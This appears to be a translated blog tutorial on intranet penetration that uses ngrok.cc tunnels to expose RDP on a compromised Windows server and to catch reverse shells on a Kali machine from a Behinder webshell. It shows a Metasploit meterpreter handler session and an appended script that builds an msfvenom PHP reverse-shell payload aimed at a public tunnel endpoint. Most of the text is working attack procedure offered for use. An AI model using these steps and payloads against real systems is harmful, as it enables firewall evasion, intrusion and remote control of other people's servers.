Intranet penetration with an ngrok tunnel

Scenario 1: I have a shell with administrator rights on a Windows system. I manually opened port 3389, but an nmap scan showed 3389 as filtered, so I suspected it was being blocked by the firewall. After many in-depth exchanges with Du Niang (Baidu), I decided to use an ngrok tunnel: map the server's port 3389 to the public network, then log in remotely.

1. Visit the ngrok.cc site (the Sunny-Ngrok service, whose client is named sunny) at http://www.ngrok.cc/ and register an account

2. Buy the free tunnel on the American server (free, and particularly prone to problems)

3. Open the tunnel

The http/https protocol requires your own domain name. The tunnel name and remote port can be whatever you like; just pick something and use it.

The most important field is the local port, written as IP:port, where IP is the local address of the machine that runs the client:

To map port 80 to the public network, enter IP:80

To map port 3389 to the public network, enter IP:3389

4. Confirm to open the tunnel

5. Enter the tunnel management page

6. Click through to the client download page and download the client that matches the server's platform

(My server is win64, so I downloaded the win64 client)

7. Upload the downloaded client to the server and run it

8. Enter the tunnel ID shown on the tunnel management page

9. The tunnel is successfully established

10. The web page also shows the tunnel as online

11. Test: port 3389 on the internal network has been tunnelled to the public network, so log in to 3389 using the public address

12. Login succeeds; port 3389 on the internal network has been mapped to the public network through the tunnel

Scenario 2: you have taken down a public-facing server and need to bounce a shell back to your Kali, but Kali has a private intranet IP and so has no way to receive the reverse shell. In that case use an ngrok tunnel to map Kali to the public network and receive the reverse shell through it.

Scenario 3: you have taken down a public website and uploaded a Behinder (冰蝎, "Ice Scorpion") webshell; use Behinder's reverse-shell function to bounce a shell to the Kali virtual machine on your computer.

The ngrok configuration is as follows:

Download the Linux 32-bit client to Kali (pick the build that matches your Kali's architecture) and run ./sunny clientid <tunnel id>, so that ngrok establishes the link to the Kali machine on the intranet

Behinder: put the tunnel's free domain name in the IP field

Kali: configure the listener following the prompts Behinder gives, then click connect in Behinder so the target connects back to you

root@silver:/tmp# msfconsole
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(multi/handler) > exploit 

success
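The following is an added example, not code from the original post, that puts the two halves of Scenarios 2 and 3 into one script. The Metasploit handler listens on the tunnel's local port (the session above keeps the default LPORT 4444 and sets LHOST 0.0.0.0), while the payload must dial the public endpoint that ngrok.cc assigned to the tunnel, because it is the tunnel client on Kali, not the target, that finally connects to the handler. The public host tunnel.example.com, the public port 12345 and the output name shell.php are placeholders; the ./sunny clientid form follows the page, with the tunnel ID being your own. The script only writes the resource file and prints the commands; it does not launch msfconsole itself.

```shell
#!/bin/sh
# Added example (not from the original post): wire a reverse shell through an
# ngrok-style TCP tunnel so that the payload and the handler point at the
# right ends of the tunnel.
#
# Assumed (placeholder) values; override them from the environment:
#   PUBLIC_HOST / PUBLIC_PORT : public endpoint ngrok.cc assigned to the tunnel
#   LOCAL_PORT                : the "local port" typed when the tunnel was created;
#                               the sunny client forwards public traffic to
#                               127.0.0.1:LOCAL_PORT on Kali
PUBLIC_HOST="${PUBLIC_HOST:-tunnel.example.com}"
PUBLIC_PORT="${PUBLIC_PORT:-12345}"
LOCAL_PORT="${LOCAL_PORT:-4444}"
PAYLOAD="${PAYLOAD:-php/meterpreter/reverse_tcp}"

# Payload generation command: LHOST/LPORT are the PUBLIC tunnel endpoint,
# since that is the only address the target can reach.
msfvenom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f raw -o shell.php\n' \
        "$PAYLOAD" "$PUBLIC_HOST" "$PUBLIC_PORT"
}

# Write a Metasploit resource file for the handler. It listens on every
# interface on the LOCAL tunnel port; the tunnel client delivers the
# callback there. Prints the path of the file it wrote.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST 0.0.0.0
set LPORT $LOCAL_PORT
set ExitOnSession false
exploit -j
EOF
    printf '%s\n' "$rc"
}

# Practitioner check: if nothing listens on the local port, the tunnel
# forwards the callback into nothing and the shell is silently lost.
# Returns 0 when a TCP listener is bound to the given port.
handler_listening() {
    port="$1"
    if command -v ss >/dev/null 2>&1; then
        ss -ltn 2>/dev/null | grep -q ":$port "
    else
        netstat -ltn 2>/dev/null | grep -q ":$port "
    fi
}

main() {
    rc=$(write_handler_rc "${TMPDIR:-/tmp}/ngrok_handler.rc")
    echo "1. On Kali, start the tunnel client (ID from the ngrok.cc tunnel page):"
    echo "   ./sunny clientid <tunnel-id>"
    echo "2. Start the handler on the tunnel's local port:"
    echo "   msfconsole -q -r $rc"
    echo "3. Build the payload against the PUBLIC endpoint:"
    echo "   $(msfvenom_cmd)"
    echo "4. Upload shell.php to the target; it connects to $PUBLIC_HOST:$PUBLIC_PORT,"
    echo "   which the tunnel forwards to 127.0.0.1:$LOCAL_PORT on Kali."
    if handler_listening "$LOCAL_PORT"; then
        echo "   (a listener is already bound to port $LOCAL_PORT)"
    else
        echo "   (nothing is listening on port $LOCAL_PORT yet; start the handler first)"
    fi
}

main
```

If Behinder's own reverse-shell function is used instead of msfvenom, the same rule applies: the address and port entered in Behinder are the public tunnel endpoint, and the handler's LPORT stays equal to the tunnel's local port.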


Source: blog.csdn.net/qq_32393893/article/details/108778332